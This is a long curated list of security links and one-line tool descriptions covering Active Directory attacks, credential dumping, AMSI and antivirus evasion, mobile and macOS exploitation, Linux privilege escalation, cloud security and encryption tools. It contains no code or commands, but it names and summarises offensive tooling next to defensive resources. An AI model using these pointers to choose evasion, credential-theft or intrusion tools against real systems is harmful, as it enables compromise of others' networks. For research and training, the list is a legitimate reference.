- Winerror: Get Windows Programming error codes descriptions using the command line.
- ProcessHacker: The Minimalistic x86/x64 API Hooking Library for Windows
- PVE CA Cert List Utility: Windows 2003/2008 Certificate Authority Certificate List Utility for pending requests and about-to-expire certificates
- Release the Kraken: Fileless injection into Windows Error Reporting service
- MinHook: The Minimalistic x86/x64 API Hooking Library for Windows.
- TokenPlayer: Manipulating and Abusing Windows Access Tokens.
- The Poisoned Postman: Detecting Manipulation of Compliance Features in a Microsoft Exchange Online Environment
- ntlmscan: scan for NTLM directories.
- Smbtouch-Scanner: Automatically scan the inner network to detect whether they are vulnerable.
- Block process creations originating from PSExec and WMI commands
- VDM:Vulnerable Driver Manipulation. physmem_drivers: A collection of various vulnerable (mostly physical memory exposing) drivers.
- Source code for HppDLL: local password dumping using MsvpPasswordValidate hooks
- SharpMapExec: A sharpen version of CrackMapExec. This tool is made to simplify penetration testing of networks and to create a swiss army knife that is made for running on Windows which is often a requirement during insider threat simulation engagements.
- Fibratus: A modern tool for the Windows kernel exploration and observability.
- Ultimate WDAC Bypass List: A centralized resource for previously documented WDAC bypass techniques
- Live Patching Windows API Calls Using PowerShell
- fibratus: A modern tool for the Windows kernel exploration and observability
- Active Directory Control Paths
- Gaining Domain Admin from Outside Active Directory, using Responder(LLMNR/NBT-NS/mDNS Poisoner and NTLMv1/2 Relay)
- Invoke-ADLabDeployer: Automated deployment of Windows and Active Directory test lab networks. Useful for red and blue teams.
- PowerShellClassLab: This is a set of Azure Resource Manager Templates that generates an Active Directory lab consisting of a Domain Controller, two Windows servers and a Linux server.
- ADImporter
- Low Privilege Active Directory Enumeration from a non-Domain Joined Host
- Active Directory as a C2
- Escalating privileges with ACLs in Active Directory
- Active Directory Kill Chain Attack & Defense: This document was designed to be a useful, informational asset for those looking to understand the specific tactics, techniques, and procedures (TTPs) attackers are leveraging to compromise active directory and guidance to mitigation, detection, and prevention. And understand Active Directory Kill Chain Attack and Modern Post Exploitation Adversary Tradecraft Activity.
- #TR19 Active Directory Security Track
- Penetration Testing Active Directory, Part I: I’ve had several customers come to me before a pentest and say they think they’re in a good shape because their vulnerability scan shows no critical vulnerabilities and that they’re ready for a pentest, which then leads me to getting domain administrator in fifteen minutes by just exploiting misconfigurations in AD.
- Penetration Testing Active Directory, Part II: For most of this part of the series, I will use the rsmith user credentials, as they are low-level, forcing us to do privilege escalation.
- Wagging the Dog: Abusing Resource-Based Constrained Delegation to Attack Active Directory.
- Exploiting PrivExchange: The PrivExchange tool simply logs in on Exchange Web Services to subscribe to push notifications to a specific host.
- Case Study: Password Analysis with BloodHound
- Introducing BloodHound 4.0: The Azure Update
- Bypassing AD account lockout for a compromised account
- Azure AD and ADFS best practices: Defending against password spray attacks
- windapsearch: Python script to enumerate users, groups and computers from a Windows domain through LDAP queries
- LDAP Ping and Determining Your Machine’s Site
- Non-Admin NTLM Relaying & ETERNALBLUE Exploitation
- Active Directory administrative tier model
- Exchange-AD-Privesc: Exchange privilege escalations to Active Directory
- Kerberos Resource-Based Constrained Delegation: When an Image Change Leads to a Privilege Escalation
- Hunting for reconnaissance activities using LDAP search filters
- Faking an AD account password change is possible , but detectable..
- Ethical Hacking Lessons — Building Free Active Directory Lab in Azure
- Configure the log analytics wizard
- SharpHound3
- Reset the krbtgt account password/keys
- GetNPUsers & Kerberos Pre-Auth Explained
- New-KrbtgtKeys.ps1: This script will enable you to reset the krbtgt account password and related keys while minimizing the likelihood of Kerberos authentication issues being caused by the operation.
- WinPwn: Automation for internal Windows Penetrationtest / AD-Security
- BadBlood by @davidprowe, Secframe.com, fills a Microsoft Active Directory Domain with a structure and thousands of objects. The output of the tool is a domain similar to a domain in the real world. After BadBlood is ran on a domain, security analysts and engineers can practice using tools to gain an understanding and prescribe to securing Active…
- Vulnerable-AD: Create a vulnerable active directory that's allowing you to test most of the active directory attacks in a local lab .
- ATTACK MAPPING WITH BLOODHOUND
- EXTRACTING PASSWORD HASHES FROM THE NTDS.DIT FILE
- Active-Directory-Exploitation-Cheat-Sheet: A cheat sheet that contains common enumeration and attack methods for Windows Active Directory.
- Active Directory Lab Setup Tool. ADLab: Active Directory Lab for Penetration Testing
- Rubeus: is a C# toolset for raw Kerberos interaction and abuses.
- Enabling Active Directory DNS query logging
- SharpMapExec: This tool is made to simplify penetration testing of networks and to create a swiss army knife that is made for running on Windows which is often a requirement during insider threat simulation engagements.
- Active Directory Kill Chain Attack & Defense: This document was designed to be a useful, informational asset for those looking to understand the specific tactics, techniques, and procedures (TTPs) attackers are leveraging to compromise active directory and guidance to mitigation, detection, and prevention. And understand Active Directory Kill Chain Attack and Modern Post Exploitation Adversary Tradecraft Activity.
- A little tool to play with Windows security
- Preventing Mimikatz Attacks – Blue Team – Medium
- pypykatz: Mimikatz implementation in pure Python
- Walk-through Mimikatz sekurlsa module
- (pt-br) Mimikatz: Mitigando ataques de roubo de credenciais
- PERFORMING PASS-THE-HASH ATTACKS WITH MIMIKATZ
- SharpKatz: Porting of mimikatz sekurlsa::logonpasswords, sekurlsa::ekeys and lsadump::dcsync commands
- PowerShell Scripts: Collection of PowerShell scripts
- Example of Malicious DLL Injected in PowerShell
- POWERSHELL LOGGING: OBFUSCATION AND SOME NEW(ISH) BYPASSES PART 1
- Empire: Empire is a PowerShell and Python 3.x post-exploitation framework.
- Invisi-Shell: Hide your Powershell script in plain sight. Bypass all Powershell security features.
- DevSec Defense- How DevOps Practices Can Drive Detection Development For Defenders
- Chimera: is a (shiny and very hack-ish) PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.
- Geeking out with UEFI, again
- Stracciatella: OpSec-safe Powershell runspace from within C# (aka SharpPick) with AMSI, Constrained Language Mode and Script Block Logging disabled at startup
- Detailed properties in the Office 365 audit log
- Office 365 Mail Forwarding Rules (and other Mail Rules too)
- Application Guard for Office (public preview) for admins
- o365spray: Username enumeration and password spraying tool aimed at Microsoft O365.
- AdminSubmissionsAPI scripts for URL and mail submission. Admin Submission API allows submission of URLs, mail messages, file mail messages and files to Microsoft to re-scan and get newest verdict on submitted entity. Admin Submissions API is available both to Exchange Online Protection customers as well as to Office 365 ATP customers.
- Commentator: Commentator is a tool written in PowerShell to add a comment to the file properties of a Microsoft Office document (xlsx/m, docx/m, or pptx/m).
- Exploiting MFA Inconsistencies on Microsoft Services. MFASweep: A tool for checking if MFA is enabled on multiple Microsoft Services
- msoffcrypto-tool: Python tool and library for decrypting MS Office files with passwords or other keys
- pyxlsb2: an Excel 2007+ Binary Workbook (xlsb) parser for Python
- An iOS App In Assembly
- Having fun with macOS 1days
- x18-leak: iOS 11.2-11.2.6 kernel pointer disclosure introduced by Apple's Meltdown mitigation.
- EmPyre: A post-exploitation OS X/Linux agent written in Python 2.7
- SDQAnalyzer: a Saleae analyzer plugin for the SDQ (Apple Lightning, MagSafe, Battery) protocol.
- Inside Code Signing
- jelbrekTime: An developer jailbreak for Apple watch S3 watchOS 4.1
- Disabling MacOS SIP via a VirtualBox kext Vulnerability
- mOSL: Bash script to audit and fix macOS High Sierra (10.13.x) security settings
- Objective-See:
- DoNotDisturb: Detect Evil Maid Attacks
- sniffMK: sniff mouse and keyboard events
- Remote Mac Exploitation Via Custom URL Schemes
- The Mac Malware of 2018
- KisMac2: KisMAC is a free, open source wireless stumbling and security tool for Mac OS X.
- osx-security-awesome: A collection of OSX and iOS security resources
- threadexec: A library to execute code in the context of other processes on iOS 11.
- Knowledge is Power! Using the macOS/iOS knowledgeC.db Database to Determine Precise User and Application Usage
- iOS12 Kernelcache Laundering
- kernelcache-laundering: load iOS12 kernelcaches and PAC code in IDA
- Armor: is a simple Bash script designed to create encrypted macOS payloads capable of evading antivirus scanners. Tool Designed To Create Encrypted macOS Payloads
- inject_trusts-iOS-v12.1.2-16C104-iPhone11,x.c
- opendrop: An open Apple AirDrop implementation written in Python
- A sample of the iOS malware- sha256:0d2ee9ade24163613772fdda201af985d852ab506e3d3e7f07fb3fa8b0853560
- ipwndfu: open-source jailbreaking tool for older iOS devices.
- Pair Locking your iPhone with Configurator 2
- KTRW: The journey to build a debuggable iPhone.
- Privilege Escalation | macOS Malware & The Path to Root Part 2. JSS-Scripts: Random scripts for use in the Jamf Pro.
- MacOS Red Teaming 211: Dylib Hijacking
- iOS Application Injection: Having been interested jailbreaking iOS devices for going on almost a decade, mixing security and this makes sense. Within this entry, I document my method of checking if an application can have code injected.
- The Mac Malware of 2019 👾: a comprehensive analysis of the year's new malware
- OSX.EvilQuest Uncovered
- Low-Level Process Hunting on macOS
- CVE-2020–9934: Bypassing TCC ...for unauthorized access to sensitive user data!
- Attack Secure Boot of SEP windknown@pangu
- Compromising the macOS Kernel through Safari by Chaining Six Vulnerabilities
- Sinter: New user-mode security enforcement for macOS. A user-mode application authorization system for MacOS written in Swift
- Who put that in my Full Disk Access list? ssh and Mojave’s privacy protection
- macOS-Fortress: Firewall and Privatizing Proxy for Trackers, Attackers, Malware, Adware, and Spammers with Anti-Virus On-Demand and On-Access Scanning (PF, squid, privoxy, hphosts, dshield, emergingthreats, hostsfile, PAC file, clamav).
- From zero to tfp0 - Part 1: Prologue
- From zero to tfp0 - Part 2: A Walkthrough of the voucher_swap exploit
- We Hacked Apple for 3 Months: Here’s What We Found, some useful scripts available
- MACOS INJECTION VIA THIRD-PARTY FRAMEWORKS
- NetworkSniffer: Log iOS network traffic without a proxy
- tip toeing past android 7’s network security configuration
- A Story About Three Bluetooth Vulnerabilities in Android
- Creating an Android Open Source Research Device on Your PC
- Droidefense: Advance Android Malware Analysis Framework
- android-device-check: Check Android device security settings
- Project Zero: OATmeal on the Universal Cereal Bus: Exploiting Android phones over USB
- I'm looking at a Huawei P20 from China, let see what can I found
- Tracking down the developer of Android adware affecting millions of users
- CLI tool to analyze APKs
- Breaking Samsung's Root of Trust: Exploiting Samsung S10 S-Boot
- TiYunZong-An-Exploit-Chain-to-Remotely-Root-Modern-Android-Devices
- Exploiting Android Messengers with WebRTC: Part 3
- setools-android: Unofficial port of setools to Android with additional sepolicy-inject utility included.
- Security Guidelines: OpenHarmony is an open OS that allows you to easily develop services and applications. It provides an execution environment to ensure security of application data and user data.
- BCC: Tools for BPF-based Linux IO analysis, networking, monitoring, and more
- OpenSnitch is a GNU/Linux port of the Little Snitch application firewall
- Security Onion:Linux distro for IDS, NSM, and Log Management
- Linux Kernel Defence Map
- wcc: The Witchcraft Compiler Collection
- Ground Zero: Reverse Engineering:
- Part 1-2: Password Protected Reverse Shells – Linux x64
- Active Directory Dojo:
- Active Directory Penetration Dojo - Setup of AD Penetration Lab : Part 1 - ScriptDotSh
- Active Directory Penetration Dojo- Setup of AD Penetration Lab : Part 2 - ScriptDotSh
- Active Directory Penetration Dojo- Creation of Forest Trust: Part 3 - ScriptDotSh
- Active Directory Penetration Dojo – AD Environment Enumeration -1 - ScriptDotSh
- Dmesg under the hood: Dmesg allows us to grasp what's going on under the hood when the kernel gets bad. Check out how dmesg is able to read kernel logs and show to the user.
- Randomize your MAC address using NetworkManager
- Shadow-Box: Lightweight and Practical Kernel Protector for x86 (Presented at BlackHat Asia 2017/2018, beVX 2018 and HITBSecConf 2017) - presentation and other papers
- Privilege Escalation: pentestbook
- Project Zero: A cache invalidation bug in Linux memory management
- Announcing flickerfree boot for Fedora 29
- The Linux Backdoor Attempt of 2003
- (PT-BR) Análise de binários em Linux
- GMER: Rootkit Detector and Remover
- suprotect: Changing memory protection in an arbitrary process
- A look at home routers, and a surprising bug in Linux/MIPS
- (pt-br) Hacking Tricks: Escalação de Privilégio em Linux com Capability
- Basic Linux Privilege Escalation: It's just a basic & rough guide.
- Linux process infection (part I):Among the different tasks that a Red Team should carry out, there is one that is remarkable by its intrinsic craftsmanship: putting an APT inside a computer system and ensuring its persistence.
- tpotce: T-Pot Universal Installer and ISO Creator.
- Linux Privilege Escalation via LXD & Hijacked UNIX Socket Credentials: LXD is a management API for dealing with LXC containers on Linux systems. It will perform tasks for any members of the local lxd group. It does not make an effort to match the permissions of the calling user to the function it is asked to perform.
- Linux Kernel exploitation Tutorial.
- The 101 of ELF files on Linux: Understanding and Analysis - Linux Audit
- ebpf_exporter: Prometheus exporter for custom eBPF metrics
- Zydra: is a file password recovery tool and Linux shadow file cracker. It uses the dictionary search or Brute force method for cracking passwords.
- A gentle introduction to Linux Kernel fuzzing - code
- Teardown of a Failed Linux LTS Spectre Fix: Today's blog will serve as a deep dive into a recent Spectre fix, one of dozens being manually applied to the upstream Linux kernel. We'll cover the full path this fix took, from its warning-inducing initial state to its correction upstream and then later brokenness when backported to all of the upstream Long Term Support (LTS) kernels.
- Ropstar: Automatic exploit generation for simple linux pwn challenges.
- Ken Thompson's Unix password
- Exploiting Wi-Fi Stack on Tesla Model S
- dlinject.py: Inject a shared library (i.e. arbitrary code) into a live linux process, without ptrace
- (Ab)using Kerberos from Linux
- LKRG: Linux Kernel Runtime Guard
- Privilege Escalation via Python Library Hijacking
- Logging Passwords on Linux
- Kicksecure ™: A Security-hardened, Non-anonymous Linux Distribution
- Setuid Demystified
- ProcDump-for-Linux: A Linux version of the ProcDump Sysinternals tool
- Scout Suite: Multi-Cloud Security Auditing Tool
- Cloud Security Research: Cloud-related research releases from the Rhino Security Labs team.
- Azure-Readiness-Checklist: This checklist is your guide to the best practices for deploying secure, scalable, and highly available infrastructure in Azure. Before you go live, go through each item, and make sure you haven't missed anything important!
- gVisor: is an application kernel, written in Go, that implements a substantial portion of the Linux system surface.
- PARSEC: Platform AbstRaction for SECurity service
- CloudFail: Utilize misconfigured DNS and old database records to find hidden IP's behind the CloudFlare network
- (discontinued) HatCloud
- Uncovering bad guys hiding behind CloudFlare
- CloudFlair: Find origin servers of websites behind CloudFlare by using Internet-wide scan data from Censys.
- thsosrtl: Repo for tools - cloud and vpn. cloudIP: was originally thought of for attempting to resolve the true IP address of targets running through cloudflare.
- Preventing Exposed Azure Blob Storage
- Open Azure blobs search on grayhatwarfare.com and other updates
- git-secrets: Prevents you from committing secrets and credentials into git repositories.
- CloudMapper: CloudMapper helps you analyze your Amazon Web Services (AWS) environments.
- Security Monkey: Security Monkey monitors AWS, GCP, OpenStack, and GitHub orgs for assets and their changes over time.
- my-arsenal-of-aws-security-tools: List of open source tools for AWS security: defensive, offensive, auditing, DFIR, etc.
- RKMS: RKMS is a highly available key management service, built on top of AWS's KMS.
- FireProx: AWS API Gateway management tool for creating on the fly HTTP pass-through proxies for unique IP rotation.
- AWS IAM privileges as found using the AWS Policy Generator described at
- Sadcloud: A tool for standing up (and tearing down!) purposefully insecure cloud infrastructure.
- (PT-BR) Gerenciamento de Risco Cibernético
- RITA (Real Intelligence Threat Analytics)
- Blended threats are the future, because no matter how good your cloud security is, at some point a grumpy SRE who feels jilted over some work BS is gonna enjoy pulling one over on those C suite assholes, for $20k cash by grugq.
- ISO27001 audit in real-time....
- Gearing Towards Your Next Audit: Understanding the Difference Between Best Practice Frameworks and Regulatory Compliance Standards.
- Nuclei is a fast tool for configurable targeted scanning based on templates offering massive extensibility and ease of use. nuclei-templates: Community curated list of templates for the nuclei engine to find a security vulnerability in application.
- Secure design principles
- NIST Special Publication 800-63B: Digital Identity Guidelines
- Easy Ways to Build a Better P@$5w0rd
- Time for Password Expiration to Die
- GRASSMARLIN: Provides situational awareness of Industrial Control Systems (ICS) and Supervisory Control and Data Acquisition (SCADA) networks in support of network security assessments.
- Qualcomm chain-of-trust
- Presenting QCSuper: a tool for capturing your 2G/3G/4G air traffic on Qualcomm-based phones. github
- Logitech keyboards and mice vulnerable to extensive cyber attacks
- Cartero: Social Engineering Framework
- The Basics of Social Engineering by Chris Pritchard on DEF CON 27. Books suggested:
- Never Split Difference - Chris Voss
- The Carisma Myth - Olivia Fox Cabane
- Hacking the Human - Ian Mann
- The Art Of Social Engineering - Chris Hadnagy
- What Everybody is Saying - Joe Navarro
- Network Security Monitoring on Raspberry Pi type devices
- A secure, shared workspace for secrets
- bettercap, the Swiss army knife for network attacks and monitoring.
- Quijote is an highly configurable HTTP middleware for API security.
- Tool Analysis Result Sheet and guide, via Detecting Lateral Movement through Tracking Event Logs by jpcertcc
- EKOLABS tools repo
- Vapor PwnedPasswords Provider: Package for testing a password against Pwned Passwords V2 API in Vapor
- Is my password pwned?, bash script
- XPoCe - XPC Snooping utilties for MacOS and iOS (version 2.0)
- Enterprise Password Quality Checking using any hash data sources (HaveIBeenPwned lists, et al)
- DockerAttack: Various Tools and Docker Images
- PyREBox is a Python scriptable Reverse Engineering sandbox
- find3: High-precision indoor positioning framework, version 3
- structured-text-tools: A list of command line tools for manipulating structured text data
- telnetlogger: Simulates enough of a Telnet connection in order to log failed login attempts.
- vault: A tool for secrets management, encryption as a service, and privileged access management
- WeakNet LINUX 8: This is an information-security themed distribution that has been in development since 2010.
- HiTB: It was a part of HackTheBox platform.
- arphid: DYI 125KHz RFID read/write/emulate guide
- Pybelt: The hackers tool belt
- mhax
- U2F Support Firefox Extension
- git-bug: Distributed bug tracker embedded in Git
- mkcert: A simple zero-config tool to make locally trusted development certificates with any names you'd like
- trackerjacker: Like nmap for mapping wifi networks you're not connected to, plus device tracking
- Polymorph is a real-time network packet manipulation framework with support for almost all existing protocols
- query_huawei_wifi_router: A CLI tool that queries a Huawei LTE WiFi router (MiFi) to get statistics such as signal strength, battery status, remaining data balance etc
- kravatte: Implementation of Kravatte Encryption Suite
- noisy: Simple random DNS, HTTP/S internet traffic noise generator
- infernal-twin: wireless hacking - This is automated wireless hacking tool
- PatternAnalyzer: The purpose of this application is to analyze and create statistics of repetitive lock patterns that everyday users create and use.
- Google Chromium, sans integration with Google
- Gammux: A Gamma muxing tool. This tool merges two pictures together by splitting them into high and low brightness images.
- PDF Tools
- openvotenetwork: Implementation of anonymous Open Vote Network in go
- put2win: Script to automatize shell upload by PUT HTTP method to get meterpreter
- Tools by Morphus Labs
- Stratosphere IPS
- Convert nmap Scans into Beautiful HTML Pages
- GeoInt
- python-nubia: A command-line and interactive shell framework.
- nipe: is a script to make Tor Network your default gateway.
- fuxploider: File upload vulnerability scanner and exploitation tool.
- solo: FIDO2 USB+NFC token optimized for security, extensibility, and style
- Joint Report On Publicly Available Hacking Tools: by Canadian Centre for Cyber Security.
- APTSimulator: A toolset to make a system look as if it was the victim of an APT attack
- debugger-netwalker: NetWalker Debugger
- USB armory: open source flash-drive-sized computer
- batch_deobfuscator: Deobfuscate batch scripts obfuscated using string substitution and escape character techniques.
- Bashfuscator: A fully configurable and extendable Bash obfuscation framework. This tool is intended to help both red team and blue team.
- Big List of Naughty Strings
- Netflix Cloud Security SIRT releases Diffy: A Differencing Engine for Digital Forensics in the Cloud - diffy repo.
- Command-Line Snippets: A place to share useful, one-line commands that make your life easier.
- IP-to-ASN - Team Cymru
- 4nonimizer: A bash script for anonymizing the public IP used to browsing Internet, managing the connection to TOR network and to different VPNs providers (OpenVPN).
- free Entropy Service.
- Correct Horse Battery Staple: Secure password generator to help keep you safer online. code
- CorrectHorse: random secure password generator.
- XKCD-password-generator: Generate secure multiword passwords/passphrases, inspired by XKCD
- Using a Hardened Container Image for Secure Applications in the Cloud
- freedomfighting: A collection of scripts which may come in handy during your freedom fighting activities.
- Machine Learning and Security: Source code about machine learning and security.
- octofairy: A machine learning based GitHub bot for Issues.
- kbd-audio: Tools for capturing and analysing keyboard input paired with microphone capture
- certstreamcatcher: This tool is based on regex with effective standards for detecting phishing sites in real time using certstream and can also detect punycode (IDNA) attacks.
- Wifiphisher: is a rogue Access Point framework for conducting red team engagements or Wi-Fi security testing.
- chezmoi: Manage your dotfiles securely across multiple machines.
- hexyl: A command-line hex viewer.
- Giggity: Wraps github api for openly available information about an organization, user, or repo.
- howmanypeoplearearound: Count the number of people around you by monitoring wifi signals .
- LASCAR: Ledger's Advanced Side-Channel Analysis Repository.
- Hostintel: A Modular Python Application To Collect Intelligence For Malicious Hosts - github
- DarkNet_ChineseTrading
- mXtract: Memory Extractor & Analyzer.
- commando-vm: a fully customized, Windows-based security distribution for penetration testing and red teaming.
- Request Tracker for Incident Response
- Introducing Inkdrop 4
- AntiCheat-Testing-Framework: Framework to test any Anti-Cheat on the market. This can be used as Template or Code Base to test any Anti-Cheat and learn along the way. All this code is the result of a research done for Recon2019 (Montreal).
- IronPython, darkly: how we uncovered an attack on government entities in Europe
- inlets: Expose your local endpoints to the Internet
- Projects released by the Team intelstorm, papers
- Pwnagotchi: (⌐■_■) - Deep Reinforcement Learning vs WiFI
- spyse.py: Python API wrapper and command-line client for the tools hosted on spyse.com.
- Cloning a MAC address to bypass a captive portal
- Open Steno Project was founded by stenographer Mirabai Knight as a reaction to the closed down, proprietary nature of the court reporting industry.
- Machine Learning on Encrypted Data Without Decrypting It
- 0bin: Client side encrypted pastebin.
- Raspberry pi as poor man’s hardware hacking tool
- dorking (how to find anything on the Internet)
- usbkill: is an anti-forensic kill-switch that waits for a change on your USB ports and then immediately shuts down your computer.
- (cherrytree)[https://www.giuspen.com/cherrytree/]: A hierarchical note taking application, featuring rich text and syntax highlighting, storing data in a single xml or sqlite file. repo
- gs-transfer: Secure File Transfer via Global Socket Bounce Network.
- CORE: The Common Open Research Emulator (CORE) is a tool for emulating networks on one or more machines.
- VoightKampff: Beating Google ReCaptcha and the funCaptcha using AWS Rekognition.
- John the Ripper in the cloud: John the Ripper jumbo supports hundreds of hash and cipher types.
- SpamCop is the premier service for reporting spam.
- vector-edk: EFI Development Kit.
- H1R0GH057: tools (DDoS, lulz, etc..)
- gatekeeper: First open-source DDoS protection system
- uriDeep: Unicode encoding attacks with machine learning
- Rawsec's CyberSecurity Inventory: An inventory of tools and resources about CyberSecurity.
- gaijin tools
- Lord Of The Strings (LOTS): String extraction and classification tool for binary files, designed to extract only the strings that can be considered relevant (i.e. not garbage or false positives)
- Unit 42 Public Tools Repo: Listing of tools released by Palo Alto Networks Threat Intelligence team.
- glsnip: copy and paste across machines
- Security Tools: Most of the links listed here goes to the original sites.
- Find Virtual Hosts for Any IP Address
- ngrok: Introspected tunnels to localhost
- Pybull: Contains some cool python projects. It is 100% python coded. Have fun see_no_evil
- Python-Scripts: some scripts for penetration testing.
- SubEnum: bash script for Subdomain Enumeration
- password-store: Simple password manager using gpg and ordinary unix directories.
- DarkSearch: The 1st real Dark Web search engine (Darksearch vs Ahmia)
- Search engines for Hackers:
- Insecam: Network live IP video cameras directory.
- jigsaw project by Alphabet/Google. Outline: VPN Server.
- SSHuttle: Transparent proxy server that works as a poor man's VPN. Forwards over ssh. Doesn't require admin. Works with Linux and MacOS. Supports DNS tunneling.
- WireGuard: is an extremely simple yet fast and modern VPN that utilizes state-of-the-art cryptography. It aims to be faster, simpler, leaner, and more useful than IPSec, while avoiding the massive headache.
- Crockford’s base 32 encoding: Crockford’s base 32 encoding is a compromise between efficiency and human legibility.
- Sputnik -An Open Source Intelligence Browser Extension
- PCredz: This tool extracts Credit card numbers, NTLM(DCE-RPC, HTTP, SQL, LDAP, etc), Kerberos (AS-REQ Pre-Auth etype 23), HTTP Basic, SNMP, POP, SMTP, FTP, IMAP, etc from a pcap file or from a live interface.
- uncaptcha2: defeating the latest version of ReCaptcha with 91% accuracy
- Nefarious LinkedIn: A look at how LinkedIn spies on its users.
- ProtonVPN-CLI: Linux command-line client for ProtonVPN. Written in Python.
- CryFS: Keep your data safe in the cloud. code
- Cryptomator: Multi-platform transparent client-side encryption of your files in the cloud. code
- VeraCrypt: is a free open source disk encryption software for Windows, Mac OSX and Linux.
- CipherShed: is a program that can be used to create encrypted files or encrypt entire drives (including USB flash drives and external HDDs). code
- Boxcryptor: Security for your Cloud.
- Nextcloud E2E: End-to-end encryption RFC. Some old news about it
- DiskCryptor is an open encryption solution that offers encryption of all disk partitions, including the system partition. code
- ProjectSend is a free, open source software that lets you share files with your clients, focused on ease of use and privacy. It supports clients groups, system users roles, statistics, multiple languages, detailed logs... and much more!
- Explain Shell
- Examples of regular expressions
- A tcpdump Tutorial and Primer with Examples
- Capture WiFi / WLAN / 802.11 Probe Request with tcpdump
- A curated list of awesome Threat Intelligence resources
- Looking for value in EV Certificates
- How to find hidden cameras
- the Simple Encrypted Arithmetic Library (SEAL): This repository is a fork of Microsoft Research's homomorphic encryption implementation
- A port of ChibiOS to the Orchard radio platform
- Decent Security: Everyone can be secure.
- Introducing Certificate Transparency and Nimbus
- trillian: Trillian implements a Merkle tree whose contents are served from a data storage layer, to allow scalability to extremely large trees.
- CFSSL's CA trust store repository
- A Few Thoughts on Cryptographic Engineering
- Mailfence
- Threat Hunting Workshop - Methodologies for Threat Analysis
- Xoodoo
- CoPilot is a wireless hotspot for digital security trainers that provides an easy to use web interface for simulating custom censorship environments during trainings.
- AgentMaps: Make social simulations on interactive maps with Javascript!
- flowsscripts: Miner pools ips.
- SwiftFilter: Exchange Transport rules to detect and enable response to phishing
- The Illustrated TLS Connection: Every Byte Explained
- Practical Cryptography
- Thieves and Geeks: Russian and Chinese Hacking Communities
- ephemera-miscellany: Ephemera and other documentation associated with the 1337list project.
- The New Illustrated TLS Connection
- CleverHans: An adversarial example library for constructing attacks, building defenses, and benchmarking both
- How to Roll a Strong Password with 20-Sided Dice and Fandom-Inspired Wordlists
- Assetnote Wordlists: When performing security testing against an asset, it is vital to have high quality wordlists for content and subdomain discovery.
- HTTP/3 Explained - github/http2 explained - github
- The Practical Guide to Hacking Bluetooth Low Energy
- A Practical Guide to BLE Throughput
- Exploiting IoT enabled BLE smart bulb security
- security: Discussion area for security aspects of ECMAScript
- Template for Data Protection Impact Assessment (DPIA)
- hash collisions exploitation and other pocs, a script to collide PDFs
- Shodan - A tool for Security and Market Research
- Engineering Security: general book about a range of topics in security.
- (ru) Плакаты по информационной безопасности Российской армии: Russian counter information posters.
- Kerberos (I): How does Kerberos work? – Theory
- Beagle is an incident response and digital forensics tool which transforms security logs and data into graphs.
- Vulncode-DB project: The vulnerable code database (Vulncode-DB) is a database for vulnerabilities and their corresponding source code if available.
- One-End Encryption (OEE): Stronger than End-to-End Encryption
- Configuring MTA-STS and TLS Reporting For Your Domain
- Automatic SSL with Now and Let's Encrypt
- Hacking Digital Calipers
- Binary Hardening in IoT products: Last year, the team at CITL looked into the state of binary hardening features in IoT firmware.
- ZigDiggity: A ZigBee hacking toolkit by Bishop Fox.
- Bolstering Security with Cyber Intelligence
- Resources-for-Beginner-Bug-Bounty-Hunters: A list of resources for those interested in getting started in bug bounties
- THE DEFINITIVE GUIDE TO ENCRYPTION KEY MANAGEMENT FUNDAMENTALS
- Explanatory Reportto the Additional Protocol to the Convention on Cybercrime
- PAN-OS GlobalProtect Portal Scanner: Determine the Palo Alto PAN-OS software version of a remote GlobalProtect portal or management interface.
- Thomas Roccia's #100DaysOfCode challenge: IDA pro and a lot of another things.
- Audi A7 2014 MMI Mishandles the Format-string Specifiers
- (pt-br) BoF + Sockets + Erros de Codificação com o Python3
- AWAE/OSWE: OSWE Preparation.
- AWAE-PREP: This repository will serve as the "master" repo containing all trainings and tutorials done in preperation for OSWE in conjunction with the AWAE course. This repo will likely contain custom code by me and various courses.
- offsec_WE: learning case to prepare OSWE
- AWAE-Preparation: This repository will contain all trainings and tutorials I have done/read to prepare for OSWE / AWAE.
- From AWAE to OSWE: The Preperation Guide
- AWAE/OSWE: Preparation for coming AWAE Training.
- Security Certification Progress Chart
- study material used for the 2018 CISSP exam, site
- JustTryHarder: a cheat sheet which will aid you through the PWK course & the OSCP Exam. (Inspired by PayloadAllTheThings).
- Hacking Your Pen Testing / Red Teaming Career: Part 1
- PentesterAcademy: Courses and Online Labs.
- OSCE-exam-practice, OSCE Exam Practice - Part IX (LTER via SEH Overwrite w/ Restricted Character Set)
- RED TEAM Operator: Malware Development Essentials Course and RED TEAM Operator: Malware Development Intermediate Course
- Black Hat 2014 Keynote: Cybersecurity as Realpolitik, amazing keynote by Dan Geer (Geertinho)
- Security Guidelines for Congressional Campaigns
- From Assembly to JavaScript and back (OffensiveCon2018)
- Kudelski Security's 2018 pre-Black Hat crypto challenge
- Black Hat 2018: Expert demonstrated a new PHP code execution attack
- [DEFCON 2018] Doublethink: 8-Architecture Assembly Polyglot by Robert Xiao
- ARM-based IoT Exploit Development
- (pt-br)Uma Introdução a Threat Intelligence e Threat Hunting para Empresas Sem Orçamento Infinito
- Outflank Presentations
- The Art of De-obfuscation
- H2HC - Hackers To Hackers Conference:
- H2HC 2017: H2HC 2017 Slides/Materials/Presentations
- H2HC 2018: Slides/Materials/Presentations
- JavaDeserH2HC: Sample codes written for the Hackers to Hackers Conference magazine 2017 (H2HC).
- SBSeg 2018: Simpósio Brasileiro em Segurança da Informação e de Sistemas Computacionais (SBSeg)
- Smartphone Privacy: How Your Smartphone Tracks Your Entire Life
- Fun with LDAP and Kerberos- in AD environments
- Analysis and recommendations for standardization in penetration testing and vulnerability assessment
- The Second Crypto War—What's Different Now (by Susan Landau, Bridge Professor of Cyber Security and Policy, Tufts University)
- Objective by the Sea (2018):
- APFS Internals - Jonathan Levin
- Protecting the Garden of Eden - Patrick Wardle
- Code signing flaw in macOS - Thomas Reed
- From Apple Seeds to Apple Pie - Sarah Edwards
- When Macs Come Under ATT&CK - Richie Cyrus
- Crashing to Root - Bradon Azad
- Leveraging Apple's Game Engine for Advanced Threat Detection - Josh Stein / Jon Malm
- MacDoored - Jaron Bradley
- Who Moved my Pixels? - Mikahail Sosonkin
- Aliens Among Us - Michael Lynn
- BlackHoodie 2018 Workshop: An Introduction To Binary Exploitation
- Malware: Anti-forensics
- The 35C3 halfnarp
- SeL4-Enabled Security Mechanisms for Cyber-Physical Systems
- Mojave's Sandbox is Leaky
- Code Obfuscation 10**2+(2*a+3)%2
- DeepState: Bringing vulnerability detection tools into the development lifecycle, paper: DeepState: Symbolic Unit Testing for C and C++
- Hardware Memory Tagging to make C/C++ memory safe(r)
